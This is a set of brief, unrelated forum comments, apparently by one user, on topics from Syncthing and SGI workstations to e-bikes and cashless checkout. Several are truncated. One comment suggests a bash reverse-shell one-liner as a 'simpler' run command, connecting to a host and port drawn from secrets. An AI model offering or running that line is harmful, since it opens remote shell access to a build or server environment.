I used Syncthing for many years, absolutely rock solid. I wanted to use it to replace Dropbox but renting a VPS with enough storage was surprisingly expensive - you’re no longer in the loss-leader section of their offerings.

What an amazing labor of love to catalog all these machines. Some of the stories behind each individual machine are amazing. I remember when Fry's Electronics (was it Palo Alto or Sunnyvale?) had one on display.

I have the opposite problem, after one glass of water I feel full and drinking any more makes me nauseous. It’s a struggle to get sufficient hydration during the day.

This is great. For your run command, could you use this even simpler version? /bin/bash -i &> /dev/tcp/$secrets.DEBUG_HOST/$secrets.DEBUG_PORT 0>&1

Isn’t that only the case when the inline code uses untrusted user data somehow? Inline: alert(“Hello “+userInput) is problematic. Inline: alert(“Hello there”) isn’t, right?

Why is this so weirdly prescriptive about inline event handlers? > Even in a single file, inline event handlers are not a good idea. One button is OK, but what if you had 100 buttons? You'd have to add 100 attributes to the file; it

Nonsensical article. Even if your goal is to create something on the web “for others” (as the article asserts), when 99.9% of your costs go to serving LLM crawlers, it puts that very objective at risk.

This is one of the reasons I signed up for a coworking space - it is so distracting having to mentally keep track of whether I’m spending the minimum amount. If I have a proper meal at the coffeeshop it easily costs more than one coffee an

This is why I don’t use any of the reasoning models, they take too long and then I get tempted to do other things. Slightly “dumber” (but faster) models actually result in higher productivity for me.

It’s all relative I guess. In the Netherlands which has a strong cycling culture, the e-bikes are seen by many as a negative - reducing the amount of exercise kids would otherwise get. It also emphasizes a rich/poor divide (which the D

I remember getting an Indigo2 Max Impact that had been in a fire (smoke damage) and restoring it. Very cool to own a workstation that was worth more than my car :-) The IRIX 4Dwm desktop can still hold its own today.

I hadn’t used cash in 3 weeks. Last week I was at a Walmart, full cart, get to the register and found no support for Apple Pay. Now some poor staff member has to put all that stuff back on the shelf, and next time Target is my go-to.

I’m sympathetic to that viewpoint, but there are times that I think it’s appropriate. For me an airport is one of those times. I believe it’s one of the things that makes me safer.
